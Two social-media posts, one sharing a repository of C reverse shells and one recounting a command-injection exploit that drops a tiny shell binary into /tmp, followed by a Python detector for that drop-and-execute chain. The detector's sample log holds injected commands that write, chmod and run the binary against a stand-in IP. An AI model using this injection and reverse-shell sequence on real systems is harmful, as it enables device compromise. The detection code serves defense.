#reverseshell

Hello!
I wanted to share 2 reverse shells I have made in C, for both Windows and Linux! It's only the source codes of them, non-compiled that is.

They are made with being as short as possible in mind, so they are not "fancy" in any way.

Contributions are ofc welcome! Reach out to me if you have any questions.
Have a nice day! I will leave the link to the GitHub Repo below.

- github.com/loneicewolf/Reverse

*Hopefully they are useful :tuturu:

GitHub: loneicewolf/ReverseShells

I had a command injection vulnerability, but the target system didn't have netcat or other (obvious) means of getting a reverse shell. What to do? I wrote a minuscule "nc -e /bin/sh" in C + MIPS assembly, then wrote a small JavaScript stager that would encode the binary to an "echo -ne 'payload'" command that would then be used to drop the binary to /tmp, chmod it and execute with the desired IP address and port. The nanonc tool sintonen.fi/src/nanonc/ supports both listen and connect back modes. The code calls the Linux kernel directly, doesn't use libc at all and has custom startup code. The (low effort) stripped mipsel binary was 1372 bytes. I'm sure it could be made way way smaller, but this was well within reason already.

Was this total overkill and a wholly unnecessary amount of work just to exploit this vulnerability? Yes. Did I learn a lot about the MIPS platform, MIPS calling conventions and how to create tiny apps calling the Linux kernel directly? Oh yes. #infosec #hacking #exploitation #tooling #reverseshell
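From the defender's side, the drop sequence described in the post above (an `echo -ne` with escaped bytes redirected into /tmp, then chmod, then execution of the same path) leaves a recognisable ordered chain in command logs. The following is an added example, not code from either post or from the tools they link: the log format, host names, paths and sample lines are constructed, and the directory list is an assumption.

```python
import re
import shlex
from itertools import groupby

DROP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # assumed world-writable staging dirs
ESCAPED_BYTE = re.compile(r"\\(?:x[0-9a-fA-F]{1,2}|0[0-7]{0,3})")  # \xNN, \0NNN
SEPARATORS = {";", "&", "&&", "|", "||"}

def simple_commands(cmdline):
    """Split a shell line into simple commands (token lists), honouring quotes."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lex.whitespace_split, lex.commenters = True, ""
    groups = groupby(lex, key=lambda tok: tok in SEPARATORS)
    return [list(g) for is_sep, g in groups if not is_sep]

def classify(cmd):
    """Map one simple command to (stage, path), or (None, None)."""
    if cmd[0] == "echo" and any(re.fullmatch(r"-[neE]*e[neE]*", t) for t in cmd):
        for i, tok in enumerate(cmd[:-1]):
            if (tok in (">", ">>") and cmd[i + 1].startswith(DROP_DIRS)
                    and any(ESCAPED_BYTE.search(t) for t in cmd[:i])):
                return "drop", cmd[i + 1]
    elif cmd[0] == "chmod" and len(cmd) > 2 and cmd[-1].startswith(DROP_DIRS):
        mode = cmd[1]  # symbolic (+x, u+x) or octal with any execute bit set
        if "x" in mode.partition("+")[2] or (
                mode.isdigit() and any(int(d) & 1 for d in mode[-3:])):
            return "chmod", cmd[-1]
    elif cmd[0].startswith(DROP_DIRS):
        return "exec", cmd[0]
    return None, None

def detect(events):
    """Return (host, path) for each drop -> chmod -> exec chain seen in order."""
    need, stage, alerts = {"drop": 0, "chmod": 1, "exec": 2}, {}, []
    for host, cmdline in events:
        for kind, path in map(classify, simple_commands(cmdline)):
            seen = stage.get((host, path), 0)
            if kind == "drop" or (kind and seen == need[kind]):
                stage[(host, path)] = max(seen, need[kind] + 1)
                if kind == "exec":
                    alerts.append((host, path))
    return alerts

# Constructed sample: command strings as an application or audit log might record them.
SAMPLE = [
    ("cam01", r"ping -c 1 192.0.2.10; echo -ne '\x7fELF\x01\x01' > /tmp/n"),
    ("cam01", r"ping -c 1 192.0.2.10; echo -ne '\x00;\x3c\x08' >> /tmp/n"),
    ("cam01", "ping -c 1 192.0.2.10; chmod 755 /tmp/n; /tmp/n 198.51.100.7 4444"),
    ("build02", r"echo -e 'done\n' > /tmp/status; chmod +x /tmp/b.sh && /tmp/b.sh"),
]
```

`detect(SAMPLE)` flags only `/tmp/n` on `cam01`; the `build02` line is not flagged because the file it executes was never written by an escaped-byte `echo`.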